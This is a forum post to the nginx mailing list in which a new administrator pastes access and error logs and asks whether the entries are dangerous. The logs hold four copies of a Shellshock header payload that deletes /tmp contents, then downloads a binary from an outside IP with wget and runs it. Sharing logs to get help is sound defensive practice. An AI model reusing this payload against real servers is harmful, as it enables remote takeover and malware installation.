Suspicious log records
janro
nginx-forum at forum.nginx.org
Sat Oct 22 10:19:54 UTC 2016
Hi everyone.
I'm newbie with Nginx and with servers and I thought to ask your opinion
about the log input I noticed from last night.
There's clearly a some sort of malicious attempt in access.log which is
repeated four times. In error.log there's only 'closed keepalive connection'
records, which matches with those four attempts.
Everything runs fine on server side. I just like to know that is this just a
normal day in a world of server logs or something critical that need
actions?
Access.log
61.147.247.161 - - [22/Oct/2016:00:10:14 +0300] "GET / HTTP/1.1" 301 184 "()
{ :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
-O /tmp/China.Z-axgfh >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-axgfh >> /tmp/Run.sh;echo
/tmp/China.Z-axgfh >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
/tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
\x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O
/tmp/China.Z-axgfh >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo
chmod 777 /tmp/China.Z-axgfh >> /tmp/Run.sh;echo /tmp/China.Z-axgfh >>
/tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777
/tmp/Run.sh;/tmp/Run.sh\x22" "-"
61.147.247.161 - - [22/Oct/2016:00:11:08 +0300] "GET / HTTP/1.1" 301 184 "()
{ :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
-O /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo
/tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
/tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
\x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O
/tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo
/tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
/tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-"
61.147.247.161 - - [22/Oct/2016:00:12:28 +0300] "GET / HTTP/1.1" 301 184 "()
{ :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
-O /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo
/tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
/tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
\x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O
/tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo
/tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
/tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-"
61.147.247.161 - - [22/Oct/2016:00:13:29 +0300] "GET / HTTP/1.1" 301 184 "()
{ :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
-O /tmp/China.Z-xxmb >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-xxmb >> /tmp/Run.sh;echo
/tmp/China.Z-xxmb >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
/tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
\x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O /tmp/China.Z-xxmb
>> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777
/tmp/China.Z-xxmb >> /tmp/Run.sh;echo /tmp/China.Z-xxmb >>
/tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777
/tmp/Run.sh;/tmp/Run.sh\x22" "-"
Error.log
2016/10/22 00:10:15 [info] 1751#0: *27218 client 61.147.247.161 closed
keepalive connection
2016/10/22 00:11:09 [info] 1751#0: *27219 client 61.147.247.161 closed
keepalive connection
2016/10/22 00:12:29 [info] 1751#0: *27220 client 61.147.247.161 closed
keepalive connection
2016/10/22 00:13:29 [info] 1751#0: *27221 client 61.147.247.161 closed
keepalive connection
Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270472,270472#msg-270472
More information about the nginx
mailing list